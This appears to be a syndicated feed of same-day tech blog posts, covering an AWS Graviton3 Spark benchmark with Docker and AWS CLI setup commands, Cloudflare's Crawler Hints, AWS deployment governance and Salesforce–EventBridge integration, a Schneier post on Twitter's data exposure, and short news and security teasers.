Amazon EMR on EKS gets up to 19% performance boost running on AWS Graviton3 Processors vs. Graviton2

2022-08-12 Melody Yang

Post Syndicated from Melody Yang original https://aws.amazon.com/blogs/big-data/amazon-emr-on-eks-gets-up-to-19-performance-boost-running-on-aws-graviton3-processors-vs-graviton2/

Amazon EMR on EKS is a deployment option that enables you to run Spark workloads on Amazon Elastic Kubernetes Service (Amazon EKS) easily. It allows you to innovate faster with the latest Apache Spark on Kubernetes architecture while benefiting from the performance-optimized Spark runtime powered by Amazon EMR. This deployment option elects Amazon EKS as its underlying compute to orchestrate containerized Spark applications with better price performance.

AWS continually innovates to provide choice and better price-performance for our customers, and the third-generation Graviton processor is the next step in the journey. Amazon EMR on EKS now supports Amazon Elastic Compute Cloud (Amazon EC2) C7g—the latest AWS Graviton3 instance family. On a single EKS cluster, we measured EMR runtime for Apache Spark performance by comparing C7g with C6g families across selected instance sizes of 4XL, 8XL and 12XL. We are excited to observe a maximum 19% performance gain over the 6th generation C6g Graviton2 instances, which leads to a 15% cost reduction.

In this post, we discuss the performance test results that we observed while running the same EMR Spark runtime on different Graviton-based EC2 instance types.

For some use cases, such as the benchmark test, running a data pipeline that requires a mix of CPU types for the granular-level cost efficiency, or migrating an existing application from Intel to Graviton-based instances, we usually spin up different clusters that host separate types of processors, such as x86_64 vs. arm64. However, Amazon EMR on EKS has made it easier. In this post, we also provide guidance on running Spark with multiple CPU architectures in a common EKS cluster, so that we can save significant time and effort on setting up a separate cluster to isolate the workloads.

Infrastructure innovation

AWS Graviton3 is the latest generation of AWS-designed Arm-based processors, and C7g is the first Graviton3 instance in AWS. The C family is designed for compute-intensive workloads, including batch processing, distributed analytics, data transformations, log analysis, and more. Additionally, C7g instances are the first in the cloud to feature DDR5 memory, which provides 50% higher memory bandwidth compared to DDR4 memory, to enable high-speed access to data in memory. All these innovations are well-suited for big data workloads, especially the in-memory processing framework Apache Spark.

The following table summarizes the technical specifications for the tested instance types:

Instance Name	vCPUs	Memory (GiB)	EBS-Optimized Bandwidth (Gbps)	Network Bandwidth (Gbps)	On-Demand Hourly Rate
c6g.4xlarge	16	32	4.75	Up to 10	$0.544
c7g.4xlarge	16	32	Up to 10	Up to 15	$0.58
c6g.8xlarge	32	64	9	12	$1.088
c7g.8xlarge	32	64	10	15	$1.16
c6g.12xlarge	48	96	13.5	20	$1.632
c7g.12xlarge	48	96	15	22.5	$1.74

These instances are all built on AWS Nitro System, a collection of AWS-designed hardware and software innovations. The Nitro System offloads the CPU virtualization, storage, and networking functions to dedicated hardware and software, delivering performance that is nearly indistinguishable from bare metal. Especially, C7g instances have included support for Elastic Fabric Adapter (EFA), which becomes the standard on this instance family. It allows our applications to communicate directly with network interface cards providing lower and more consistent latency. Additionally, these are all Amazon EBS-optimized instances, and C7g provides higher dedicated bandwidth for EBS volumes, which can result in better I/O performance contributing to quicker read/write operations in Spark.

Performance test results

To quantify performance, we ran TPC-DS benchmark queries for Spark with a 3TB scale. These queries are derived from TPC-DS standard SQL scripts, and the test results are not comparable to other published TPC-DS benchmark outcomes. Apart from the benchmark standards, a single Amazon EMR 6.6 Spark runtime (compatible with Apache Spark version 3.2.0) was used as the data processing engine across six different managed node groups on an EKS cluster: C6g_4, C7g_4,C6g_8, C7g_8, C6g_12, C7g_12. These groups are named after instance type to distinguish the underlying compute resources. Each group can automatically scale between 1 and 30 nodes within its corresponding instance type. Architecting the EKS cluster in such a way, we can run and compare our experiments in parallel, each of which is hosted in a single node group, i.e., an isolated compute environment on a common EKS cluster. It also makes it possible to run an application with multiple CPU architectures on the single cluster. Check out the sample EKS cluster configuration and benchmark job examples for more details.

We measure the Graviton performance and cost improvements using two calculations: total query runtime and geometric mean of the total runtime. The following table shows the results for equivalent sized C6g and C7g instances and the same Spark configurations.

Benchmark Attributes	12 XL	8 XL	4 XL
Task parallelism (spark.executor.core*spark.executor.instances)	188 cores (4*47)	188 cores (4*47)	188 cores (4*47)
spark.executor.memory	6 GB	6 GB	6 GB
Number of EC2 instances	5	7	16
EBS volume	4 * 128 GB io1 disk	4 * 128 GB io1 disk	4 * 128 GB io1 disk
Provisioned IOPS per volume	6400	6400	6400
Total query runtime on C6g (sec)	2099	2098	2042
Total query runtime on C7g (sec)	1728	1738	1660
Total run time improvement with C7g	18%	17%	19%
Geometric mean query time on C6g (sec)	9.74	9.88	9.77
Geometric mean query time on C7g (sec)	8.40	8.32	8.08
Geometric mean improvement with C7g	13.8%	15.8%	17.3%
EMR on EKS memory usage cost on C6g (per run)	$0.28	$0.28	$0.28
EMR on EKS vCPU usage cost on C6g (per run)	$1.26	$1.25	$1.24
Total cost per benchmark run on C6g (EC2 + EKS cluster + EMR price)	$6.36	$6.02	$6.52
EMR on EKS memory usage cost on C7g (per run)	$0.23	$0.23	$0.22
EMR on EKS vCPU usage cost on C7g (per run)	$1.04	$1.03	$0.99
Total cost per benchmark run on C7g (EC2 + EKS cluster + EMR price)	$5.49	$5.23	$5.54
Estimated cost reduction with C7g	13.7%	13.2%	15%

The total number of cores and memory are identical across all benchmarked instances, and four provisioned IOPS SSD disks were attached to each EBS-optimized instance for the optimal disk I/O performance. To allow for comparison, these configurations were intentionally chosen to match with settings in other EMR on EKS benchmarks. Check out the previous benchmark blog post Amazon EMR on Amazon EKS provides up to 61% lower costs and up to 68% performance improvement for Spark workloads for C5 instances based on x86_64 Intel CPU.

The table indicates C7g instances have consistent performance improvement compared to equivalent C6g Graviton2 instances. Our test results showed 17–19% improvement in total query runtime for selected instance sizes, and 13.8–17.3% improvement in geometric mean. On cost, we observed 13.2–15% cost reduction on C7g performance tests compared to C6g while running the 104 TPC-DS benchmark queries.

Data shuffle in a Spark workload

Generally, big data frameworks schedule computation tasks for different nodes in parallel to achieve optimal performance. To proceed with its computation, a node must have the results of computations from upstream. This requires moving intermediate data from multiple servers to the nodes where data is required, which is termed as shuffling data. In many Spark workloads, data shuffle is an inevitable operation, so it plays an important role in performance assessments. This operation may involve a high rate of disk I/O, network data transmission, and could burn a significant amount of CPU cycles.

If your workload is I/O bound or bottlenecked by current data shuffle performance, one recommendation is to benchmark on improved hardware. Overall, C7g offers better EBS and network bandwidth compared to equivalent C6g instance types, which may help you optimize performance. Therefore, in the same benchmark test, we captured the following extra information, which is broken down into per-instance-type network/IO improvements.

Based on the TPC-DS query test result, this graph illustrates the percentage increases of data shuffle operations in four categories: maximum disk read and write, and maximum network received and transmitted. In comparison to c6g instances, the disk read performance improved between 25–45%, whereas the disk write performance increase was 34–47%. On the network throughput comparison, we observed an increase of 21–36%.

Run an Amazon EMR on EKS job with multiple CPU architectures

If you’re evaluating migrating to Graviton instances for Amazon EMR on EKS workloads, we recommend testing the Spark workloads based on your real-world use cases. If you need to run workloads across multiple processor architectures, for example test the performance for Intel and Arm CPUs, follow the walkthrough in this section to get started with some concrete ideas.

Build a single multi-arch Docker image

To build a single multi-arch Docker image (x86_64 and arm64), complete the following steps:

Get the Docker Buildx CLI extension.Docker Buildx is a CLI plugin that extends the Docker command to support the multi-architecture feature. Upgrade to the latest Docker desktop or manually download the CLI binary. For more details, check out Working with Buildx.
Validate the version after the installation:
```
docker buildx version
```
Create a new builder that gives access to the new multi-architecture features (you only have to perform this task once):
```
docker buildx create --name mybuilder --use
```

AWS_REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
ECR_URL=$ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com
aws ecr get-login-password --region $AWS_REGION | docker login --username AWS --password-stdin $ECR_URL

Get the EMR Spark base image from AWS:

SRC_ECR_URL=755674844232.dkr.ecr.us-east-1.amazonaws.com
docker pull $SRC_ECR_URL/spark/emr-6.6.0:latest
aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin $SRC_ECR_URL

Build and push a custom Docker image.

In this case, we build a single Spark benchmark utility docker image on top of Amazon EMR 6.6. It supports both Intel and Arm processor architectures:

linux/amd64 – x86_64 (also known as AMD64 or Intel 64)
linux/arm64 – Arm

docker buildx build \
--platform linux/amd64,linux/arm64 \
-t $ECR_URL/eks-spark-benchmark:emr6.6 \
-f docker/benchmark-util/Dockerfile \
--build-arg SPARK_BASE_IMAGE=$SRC_ECR_URL/spark/emr-6.6.0:latest \
--push .

Submit Amazon EMR on EKS jobs with and without Graviton

For our first example, we submit a benchmark job to the Graviton3 node group that spins up c7g.4xlarge instances.

The following is not a complete script. Check out the full version of the example on GitHub.

aws emr-containers start-job-run \
--virtual-cluster-id $VIRTUAL_CLUSTER_ID \
--name emr66-c7-4xl \
--execution-role-arn $EMR_ROLE_ARN \
--release-label emr-6.6.0-latest \
--job-driver '{
    "sparkSubmitJobDriver": {
    "entryPoint": "local:///usr/lib/spark/examples/jars/eks-spark-benchmark-assembly-1.0.jar",
    "entryPointArguments":[.......],
    "sparkSubmitParameters": "........"}}' \
--configuration-overrides '{
"applicationConfiguration": [{
    "classification": "spark-defaults",
    "properties": {
        "spark.kubernetes.container.image": "'$ECR_URL'/eks-spark-benchmark:emr6.6",
        "spark.kubernetes.node.selector.eks.amazonaws.com/nodegroup": “C7g_4”
}}]}'

In the following example, we run the same job on non-Graviton C5 instances with Intel 64 CPU. The full version of the script is available on GitHub.

aws emr-containers start-job-run \
--virtual-cluster-id $VIRTUAL_CLUSTER_ID \
--name emr66-c5-4xl \
--execution-role-arn $EMR_ROLE_ARN \
--release-label emr-6.6.0-latest \
--job-driver '{
    "sparkSubmitJobDriver": {
    "entryPoint": "local:///usr/lib/spark/examples/jars/eks-spark-benchmark-assembly-1.0.jar",
    "entryPointArguments":[.......],
    "sparkSubmitParameters": "........"}}' \    
--configuration-overrides '{
"applicationConfiguration": [{
    "classification": "spark-defaults",
    "properties": {
        "spark.kubernetes.container.image": "'$ECR_URL'/eks-spark-benchmark:emr6.6",
        "spark.kubernetes.node.selector.eks.amazonaws.com/nodegroup”: “C5_4”
}}]}'

Summary

In May 2022, the Graviton3 instance family was made available to Amazon EMR on EKS. After running the performance-optimized EMR Spark runtime on the selected latest Arm-based Graviton3 instances, we observed up to 19% performance increase and up to 15% cost savings compared to C6g Graviton2 instances. Because Amazon EMR on EKS offers 100% API compatibility with open-source Apache Spark, you can quickly step into the evaluation process with no application changes.

If you’re wondering how much performance gain you can achieve with your use case, try out the benchmark solution or the EMR on EKS Workshop. You can also contact your AWS Solutions Architects, who can be of assistance alongside your innovation journey.

About the author

Melody Yang is a Senior Big Data Solution Architect for Amazon EMR at AWS. She is an experienced analytics leader working with AWS customers to provide best practice guidance and technical advice in order to assist their success in data transformation. Her areas of interests are open-source frameworks and automation, data engineering and DataOps.

Документи на „Биволъ“ „Ние ще разтоварваме“. 200 мутри тероризират Капитан-Андреево с фалшиви пълномощни

2022-08-12 Николай Марченко

Post Syndicated from Николай Марченко original https://bivol.bg/%D0%BD%D0%B8%D0%B5-%D1%89%D0%B5-%D1%80%D0%B0%D0%B7%D1%82%D0%BE%D0%B2%D0%B0%D1%80%D0%B2%D0%B0%D0%BC%D0%B5-200-%D0%BC%D1%83%D1%82%D1%80%D0%B8-%D1%82%D0%B5%D1%80%D0%BE%D1%80%D0%B8.html

петък 12 август 2022

Около 200 души от 4 ключови фирми на Керопе Чакърян – Ами, Красимир Каменов – Къро и укриващия се в Дубай наркобос Христофорос Никос Аманатидис – Таки са с пропуски…

Crawler Hints supports Microsoft’s IndexNow in helping users find new content

2022-08-12 Alex Krivit

Post Syndicated from Alex Krivit original https://blog.cloudflare.com/crawler-hints-supports-microsofts-indexnow-in-helping-users-find-new-content/

Crawler Hints supports Microsoft’s IndexNow in helping users find new content

The web is constantly changing. Whether it’s news or updates to your social feed, it’s a constant flow of information. As a user, that’s great. But have you ever stopped to think how search engines deal with all the change?

It turns out, they “index” the web on a regular basis — sending bots out, to constantly crawl webpages, looking for changes. Today, bot traffic accounts for about 30% of total traffic on the Internet, and given how foundational search is to using the Internet, it should come as no surprise that search engine bots make up a large proportion of that what might come as a surprise is how inefficient the model is, though: we estimate that over 50% of crawler traffic is wasted effort.

This has a huge impact. There’s all the additional capacity that owners of websites need to bake into their site to absorb the bots crawling all over it. There’s the transmission of the data. There’s the CPU cost of running the bots. And when you’re running at the scale of the Internet, all of this has a pretty big environmental footprint.

Part of the problem, though, is nobody had really stopped to ask: maybe there’s a better way?

Right now, the model for indexing websites is the same as it has been since the 1990s: a “pull” model, where the search engine sends a crawler out to a website after a predetermined amount of time. During Impact Week last year, we asked: what about flipping the model on its head? What about moving to a push model, where a website could simply ping a search engine to let it know an update had been made?

There are a heap of advantages to such a model. The website wins: it’s not dealing with unnecessary crawls. It also makes sure that as soon as there’s an update to its content, it’s reflected in the search engine — it doesn’t need to wait for the next crawl. The website owner wins because they don’t need to manage distinct search engine crawl submissions. The search engine wins, too: it saves money on crawl costs, and it can make sure it gets the latest content.

Of course, this needs work to be done on both sides of the equation. The websites need a mechanism to alert the search engines; and the search engines need a mechanism to receive the alert, so they know when to do the crawl.

Crawler Hints — Cloudflare’s Solution for Websites

Solving this problem is why we launched Crawler Hints. Cloudflare sits in a unique position on the Internet — we’re serving on average 36 million HTTP requests per second. That represents a lot of websites. It also means we’re uniquely positioned to help solve this problem: to help give crawlers hints about when they should recrawl if new content has been added or if content on a site has recently changed.

With Crawler Hints, we send signals to web indexers based on cache data and origin status codes to help them understand when content has likely changed or been added to a site. The aim is to increase the number of relevant crawls as well as drastically reduce the number of crawls that don’t find fresh content, saving bandwidth and compute for both indexers and sites alike, and improving the experience of using the search engines.

But, of course, that’s just half the equation.

IndexNow Protocol — the Search Engine Moves from Pull to Push

Websites alerting the search engine about changes is useless if the search engines aren’t listening — and they simply continue to crawl the way they always have. Of course, search engines are incredibly complicated, and changing the way they operate is no easy task.

The IndexNow Protocol is a standard developed by Microsoft, Seznam.cz and Yandex, and it represents a major shift in the way search engines operate. Using IndexNow, search engines have a mechanism by which they can receive signals from Crawler Hints. Once they have that signal, they can shift their crawlers from a pull model to a push model.

In a recent update, Microsoft has announced that millions of websites are now using IndexNow to signal to search engine crawlers when their content needs to be crawled and IndexNow was used to index/crawl about 7% of all new URLs clicked when someone is selecting from web search results.

On the Cloudflare side, since the release of Crawler Hints in October 2021, Crawler Hints has processed about six-hundred-billion signals to IndexNow.

That’s a lot of saved crawls.

How to enable Crawler Hints

By enabling Crawler Hints on your website, with the simple click of a button, Cloudflare will take care of signaling to these search engines when your content has changed via the IndexNow API. You don’t need to do anything else!

Crawler Hints is free to use and available to all Cloudflare customers. If you’d like to see how Crawler Hints can benefit how your website is indexed by the world’s biggest search engines, please feel free to opt-into the service by:

Sign in to your Cloudflare Account.
In the dashboard, navigate to the Cache tab.
Click on the Configuration section.
Locate the Crawler Hints and enable.

Upon enabling Crawler Hints, Cloudflare will share when content on your site has changed and needs to be re-crawled with search engines using the IndexNow protocol (this blog can help if you’re interested in finding out more about how the mechanism works).

What’s Next?

Going forward, because the benefits are so substantial for site owners, search operators, and the environment, we plan to start defaulting Crawler Hints on for all our customers. We’re also hopeful that Google, the world’s largest search engine and most wasteful user of Internet resources, will adopt IndexNow or a similar standard and lower the burden of search crawling on the planet.

When we think of helping to build a better Internet, this is exactly what comes to mind: creating and supporting standards that make it operate better, greener, faster. We’re really excited about the work to date, and will continue to work to improve the signaling to ensure the most valuable information is being sent to the search engines in a timely manner. This includes incorporating additional signals such as etags, last-modified headers, and content hash differences. Adding these signals will help further inform crawlers when they should reindex sites, and how often they need to return to a particular site to check if it’s been changed. This is only the beginning. We will continue testing more signals and working with industry partners so that we can help crawlers run efficiently with these hints.

And finally: if you’re on Cloudflare, and you’d like to be part of this revolution in how search engines operate on the web (it’s free!), simply follow the instructions in the section above.

Sue Ann Pien, Rick Glassman and Albert Rutecki | As We See It | Talks at Google

2022-08-12 Talks at Google

Post Syndicated from Talks at Google original https://www.youtube.com/watch?v=VHYvPVv3VAY

Accelerate deployments on AWS with effective governance

2022-08-12 Rostislav Markov

Post Syndicated from Rostislav Markov original https://aws.amazon.com/blogs/architecture/accelerate-deployments-on-aws-with-effective-governance/

Amazon Web Services (AWS) users ask how to accelerate their teams’ deployments on AWS while maintaining compliance with security controls. In this blog post, we describe common governance models introduced in mature organizations to manage their teams’ AWS deployments. These models are best used to increase the maturity of your cloud infrastructure deployments.

Governance models for AWS deployments

We distinguish three common models used by mature cloud adopters to manage their infrastructure deployments on AWS. The models differ in what they control: the infrastructure code, deployment toolchain, or provisioned AWS resources. We define the models as follows:

Central pattern library, which offers a repository of curated deployment templates that application teams can re-use with their deployments.
Continuous Integration/Continuous Delivery (CI/CD) as a service, which offers a toolchain standard to be re-used by application teams.
Centrally managed infrastructure, which allows application teams to deploy AWS resources managed by central operations teams.

The decision of how much responsibility you shift to application teams depends on their autonomy, operating model, application type, and rate of change. The three models can be used in tandem to address different use cases and maximize impact. Typically, organizations start by gathering pre-approved deployment templates in a central pattern library.

Model 1: Central pattern library

With this model, cloud platform engineers publish a central pattern library from which teams can reference infrastructure as code templates. Application teams reuse the templates by forking the central repository or by copying the templates into their own repository. Application teams can also manage their own deployment AWS account and pipeline with AWS CodePipeline), as well as the resource-provisioning process, while reusing templates from the central pattern library with a service like AWS CodeCommit. Figure 1 provides an overview of this governance model.

Figure 1. Deployment governance with central pattern library

The central pattern library represents the least intrusive form of enablement via reusable assets. Application teams appreciate the central pattern library model, as it allows them to maintain autonomy over their deployment process and toolchain. Reusing existing templates speeds up the creation of your teams’ first infrastructure templates and eases policy adherence, such as tagging policies and security controls.

After the reusable templates are in the application team’s repository, incremental updates can be pulled from the central library when the template has been enhanced. This allows teams to pull when they see fit. Changes to the team’s repository will trigger the pipeline to deploy the associated infrastructure code.

With the central pattern library model, application teams need to manage resource configuration and CI/CD toolchain on their own in order to gain the benefits of automated deployments. Model 2 addresses this.

Model 2: CI/CD as a service

In Model 2, application teams launch a governed deployment pipeline from AWS Service Catalog. This includes the infrastructure code needed to run the application and “hello world” source code to show the end-to-end deployment flow.

Cloud platform engineers develop the service catalog portfolio (in this case the CI/CD toolchain). Then, application teams can launch AWS Service Catalog products, which deploy an instance of the pipeline code and populated Git repository (Figure 2).

The pipeline is initiated immediately after the repository is populated, which results in the “hello world” application being deployed to the first environment. The infrastructure code (for example, Amazon Elastic Compute Cloud [Amazon EC2] and AWS Fargate) will be located in the application team’s repository. Incremental updates can be pulled by launching a product update from AWS Service Catalog. This allows application teams to pull when they see fit.

Figure 2. Deployment governance with CI/CD as a service

This governance model is particularly suitable for mature developer organizations with full-stack responsibility or platform projects, as it provides end-to-end deployment automation to provision resources across multiple teams and AWS accounts. This model also adds security controls over the deployment process.

Since there is little room for teams to adapt the toolchain standard, the model can be perceived as very opinionated. The model expects application teams to manage their own infrastructure. Model 3 addresses this.

Model 3: Centrally managed infrastructure

This model allows application teams to provision resources managed by a central operations team as self-service. Cloud platform engineers publish infrastructure portfolios to AWS Service Catalog with pre-approved configuration by central teams (Figure 3). These portfolios can be shared with all AWS accounts used by application engineers.

Provisioning AWS resources via AWS Service Catalog products ensures resource configuration fulfills central operations requirements. Compared with Model 2, the pre-populated infrastructure templates launch AWS Service Catalog products, as opposed to directly referencing the API of the corresponding AWS service (for example Amazon EC2). This locks down how infrastructure is configured and provisioned.

Figure 3. Deployment governance with centrally managed infrastructure

In our experience, it is essential to manage the variety of AWS Service Catalog products. This avoids proliferation of products with many templates differing slightly. Centrally managed infrastructure propagates an “on-premises” mindset so it should be used only in cases where application teams cannot own the full stack.

Models 2 and 3 can be combined for application engineers to launch both deployment toolchain and resources as AWS Service Catalog products (Figure 4), while also maintaining the opportunity to provision from pre-populated infrastructure templates in the team repository. After the code is in their repository, incremental updates can be pulled by running an update from the provisioned AWS Service Catalog product. This allows the application team to pull an update as needed while avoiding manual deployments of service catalog products.

Figure 4. Using AWS Service Catalog to automate CI/CD and infrastructure resource provisioning

Comparing models

The three governance models differ along the following aspects (see Table 1):

Governance level: What component is managed centrally by cloud platform engineers?
Role of application engineers: What is the responsibility split and operating model?
Use case: When is each model applicable?

Table 1. Governance models for managing infrastructure deployments

	Model 1: Central pattern library	Model 2: CI/CD as a service	Model 3: Centrally managed infrastructure
Governance level	Centrally defined infrastructure templates	Centrally defined deployment toolchain	Centrally defined provisioning and management of AWS resources
Role of cloud platform engineers	Manage pattern library and policy checks	Manage deployment toolchain and stage checks	Manage resource provisioning (including CI/CD)
Role of application teams	Manage deployment toolchain and resource provisioning	Manage resource provisioning	Manage application integration
Use case	Federated governance with application teams maintaining autonomy over application and infrastructure	Platform projects or development organizations with strong preference for pre-defined deployment standards including toolchain	Applications without development teams (e.g., “commercial-off-the-shelf”) or with separation of duty (e.g., infrastructure operations teams)

Conclusion

In this blog post, we distinguished three common governance models to manage the deployment of AWS resources. The three models can be used in tandem to address different use cases and maximize impact in your organization. The decision of how much responsibility is shifted to application teams depends on your organizational setup and use case.

Want to learn more?

[$] A fuzzy issue of responsible disclosure

2022-08-12

Post Syndicated from original https://lwn.net/Articles/904293/

Fuzz testing is the process of supplying a program with random inputs and
watching to see what breaks; it has been responsible for the identification
of vast numbers of bugs in recent years — and the fixing of many of them.
Developers generally appreciate bug reports, but they can sometimes be a
bit less enthusiastic about a flood of reports from automated fuzzing
systems. A recent discussion around filesystem fuzzing highlighted two
points of view on whether the current fuzz-testing activity is a good
thing.

Introducing bidirectional event integrations with Salesforce and Amazon EventBridge

2022-08-12 James Beswick

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/introducing-bidirectional-event-integrations-with-salesforce-and-amazon-eventbridge/

This post is written by Alseny Diallo, Prototype Solutions Architect and Rohan Mehta, Associate Cloud Application Architect.

AWS now supports Salesforce as a partner event source for Amazon EventBridge, allowing you to send Salesforce events to AWS. You can also configure Salesforce with EventBridge API Destinations and send EventBridge events to Salesforce. These integrations enable you to act on changes to your Salesforce data in real-time and build custom applications with EventBridge and over 100 built-in sources and targets.

In this blog post, you learn how to set up a bidirectional integration between Salesforce and EventBridge and use cases for working with Salesforce events. You see an example application for interacting with Salesforce support case events with automated workflows for detecting sentiment with AWS AI/ML services and enriching support cases with customer order data.

Integration overview

Salesforce is a customer relationship management (CRM) platform that gives companies a single, shared view of customers across their marketing, sales, commerce, and service departments. Salesforce Event Relays for AWS enable bidirectional event flows between Salesforce and AWS through EventBridge.

Amazon EventBridge is a serverless event bus that makes it easier to build event-driven applications at scale using events generated from your applications, integrated software as a service (SaaS) applications, and AWS services. EventBridge partner event source integrations enable customers to receive events from over 30 SaaS applications and ingest them into their AWS applications.

Salesforce as a partner event source for EventBridge makes it easier to build event-driven applications that span customers’ data in Salesforce and applications running on AWS. Customers can send events from Salesforce to EventBridge and vice versa without having to write custom code or manage an integration.

EventBridge joins Amazon AppFlow as a way to integrate Salesforce with AWS. The Salesforce Amazon AppFlow integration is well suited for use cases that require ingesting large volumes of data, like a daily scheduled data transfer sending Salesforce records into an Amazon Redshift data warehouse or an Amazon S3 data lake. The Salesforce EventBridge integration is a good fit for real-time processing of changes to individual Salesforce records.

Use cases

Customers can act on new or modified Salesforce records through integrations with a variety of EventBridge targets, including AWS Lambda, AWS Step Functions, and API Gateway. The integration can enable use cases across industries that must act on customer events in real time.

Retailers can automatically unify their Salesforce data with AWS data sources. When a new customer support case is created in Salesforce, enrich the support case with recent order data from that customer retrieved from an orders database running on AWS.
Media and entertainment providers can augment their omnichannel experiences with AWS AI/ML services to increase customer engagement. When a new customer account is created in Salesforce, use Amazon Personalize and Amazon Simple Email Service to send a welcome email with personalized media recommendations.
Insurers can automate form processing workflows. When a new insurance claim form PDF is uploaded to Salesforce, extract the submitted information with Amazon Textract and orchestrate processing the claim information with AWS Step Functions.

Solution overview

The example application shows how the integration can enhance customer support experiences by unifying support tickets with customer order data, detecting customer sentiment, and automating support case workflows.

A new case is created in Salesforce and an event is sent to an EventBridge partner event bus.
If the event matches the EventBridge rule, the rule sends the event to both the Enrich Case and Case Processor Workflows in parallel.
The Enrich Case Workflow uses the Customer ID in the event payload to query the Orders table for the customer’s recent order. If this step fails, the event is sent to an Amazon SQS dead letter queue.
The Enrich Case Workflow publishes a new event with the customer’s recent order to an EventBridge custom event bus.
The Case Processor Workflow performs sentiment analysis on the support case content and sends a customized text message to the customer. See the diagram below for details on the workflow.
The Case Processor Workflow publishes a new event with the sentiment analysis results to the custom event bus.
EventBridge rules match the events published to the associated rules: CaseProcessorEventRule and EnrichCaseAppEventRule.
These rules send the events to EventBridge API Destinations. API Destinations sends the events to Salesforce HTTP endpoints to create two Salesforce Platform Events.
Salesforce data is updated with the two Platform Events:
1. The support case record is updated with the customer’s recent order details and the support case sentiment.
2. If the support case sentiment is negative, a task is created for an agent to follow up with the customer.

The Case Processor workflow uses Step Functions to process the Salesforce events.

Detect the sentiment of the customer feedback using Amazon Comprehend. This is positive, negative, or neutral.
Check if the customer phone number is a mobile number and can receive SMS using Amazon Pinpoint’s mobile number validation endpoint.
If the customer did not provide a mobile number, bypass the SMS steps and put an event with the detected sentiment onto the custom event bus.
If the customer provided a mobile number, send them an SMS with the appropriate message based on the sentiment of their case.
1. If sentiment is positive or neutral, the message is thanking the customer for their feedback.
2. If the sentiment is negative, the message offers additional support.
The state machine then puts an event with the sentiment analysis results onto the custom event bus.

Prerequisites

An AWS account and an AWS user with AdministratorAccess (see the instructions on the AWS Identity and Access Management (IAM) console).
Access to the following AWS services: AWS Step Functions, Amazon EventBridge, Amazon Comprehend, Amazon Pinpoint, Amazon Simple Notification Service.
AWS SAM CLI using the instructions here.

Environment setup

Follow the instructions here to set up your Salesforce Event Relay. Once you have an event bus created with the partner event source, proceed to step 2.
Copy the ARN of the event bus.
Create a Salesforce Connected App. This is used for the API Destinations configuration to send updates back into Salesforce.
You can create a new user within Salesforce with appropriate API permissions to update records. The user name and password is used by the API Destinations configuration.
The example provided by Salesforce uses a Platform Event called “Carbon Comparison”. For this sample app, you create three custom platform events with the following configurations:
1. Customer Support Case (Salesforce to AWS):
2. Processed Support Case (AWS to Salesforce):
3. Enrich Case (AWS to Salesforce):
This example application assumes that a custom Sentiment field is added to the Salesforce Case record type. See this link for how to create custom fields in Salesforce.
The example application uses Salesforce Flows to trigger outbound platform events and handle inbound platform events. See this link for how to use Salesforce Flows to build event driven applications on Salesforce.
Clone the AWS SAM template here.
```
sam build
sam deploy —guided
```
For the parameter prompts, enter:

SalesforceOauthClientId and SalesforceOauthClientSecret: Use the values created with the Connected App in step 3.
SalesforceUsername and SalesforcePassword: Use the values created for the new user in step 4.
SalesforceOauthUrl: Salesforce URL for OAuth authentication
SalesforceCaseProcessorEndpointUrl: Salesforce URL for creating a new Processed Support Case Platform Event object, in this case: https://MyDomainName.my.salesforce.com/services/data/v54.0/sobjects/Processed_Support_Case__e
SFEnrichCaseEndpointUrl: Salesforce URL for creating a new Enrich Case Platform Event object, in this case: https://MyDomainName.my.salesforce.com/services/data/v54.0/sobjects/Enrich_Case__e
SalesforcePartnerEventBusArn: Use the value from step 2.
SalesforcePartnerEventPattern: The detail-type value should be the API name of the custom platform event, in thiscase: {“detail-type”: [“Customer_Support_Case__e”]}

Conclusion

This blog shows how to act on changes to your Salesforce data in real-time using the new Salesforce partner event source integration with EventBridge. The example demonstrated how your Salesforce data can be processed and enriched with custom AWS applications and updates sent back to Salesforce using EventBridge API Destinations.

To learn more about EventBridge partner event sources and API Destinations, see the EventBridge Developer Guide. For more serverless resources, visit Serverless Land.

Twitter Exposes Personal Information for 5.4 Million Accounts

2022-08-12 Bruce Schneier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/twitter-exposes-personal-information-for-5-4-million-accounts.html

Twitter accidentally exposed the personal information—including phone numbers and email addresses—for 5.4 million accounts. And someone was trying to sell this information.

In January 2022, we received a report through our bug bounty program of a vulnerability in Twitter’s systems. As a result of the vulnerability, if someone submitted an email address or phone number to Twitter’s systems, Twitter’s systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any. This bug resulted from an update to our code in June 2021. When we learned about this, we immediately investigated and fixed it. At that time, we had no evidence to suggest someone had taken advantage of the vulnerability.

In July 2022, we learned through a press report that someone had potentially leveraged this and was offering to sell the information they had compiled. After reviewing a sample of the available data for sale, we confirmed that a bad actor had taken advantage of the issue before it was addressed.

This includes anonymous accounts.

This comment has it right:

So after forcing users to enter a phone number to continue using twitter, despite twitter having no need to know the users phone number, they then leak the phone numbers and associated accounts. Great.

But it gets worse… After being told of the leak in January, rather than disclosing the fact millions of users data had been open for anyone who looked, they quietly fixed it and hoped nobody else had found it.

It was only when the press started to notice they finally disclosed the leak.

That isn’t just one bug causing a security leak—it’s a chain of bad decisions and bad security culture, and if anything should attract government fines for lax data security, this is it.

Twitter’s blog post unhelpfully goes on to say:

If you operate a pseudonymous Twitter account, we understand the risks an incident like this can introduce and deeply regret that this happened. To keep your identity as veiled as possible, we recommend not adding a publicly known phone number or email address to your Twitter account.

Three news articles.

3 Mistakes Companies Make in Their Detection and Response Programs

2022-08-12 Jake Godgart

Post Syndicated from Jake Godgart original https://blog.rapid7.com/2022/08/12/3-mistakes-companies-make-in-their-detection-and-response-programs/

3 Mistakes Companies Make in Their Detection and Response Programs

The goal of a detection and response (D&R) program is to act as quickly as possible to identify and remove threats while minimizing any fallout. Many organizations have identified the need for D&R as a critical piece of their security program, but it’s often the hardest — and most costly — piece to implement and run.

As a result, D&R programs tend to suffer from common mistakes, and security teams often run into obstacles that hamper the value a solid program can deliver.

Recognizing this fact, our team of security experts at Rapid7 has put together a list of the top mistakes companies make in their D&R programs as well as tips to overcome or avoid them entirely.

1. Trying to analyze too much data

To have a successful and truly comprehensive D&R program, you should have complete visibility across your modern environment – from endpoints to users, cloud, network, and all other avenues attackers may enter. With all this visibility, you may think you need all the data you can get your hands on. The reality? Data “analysis paralysis” is real.

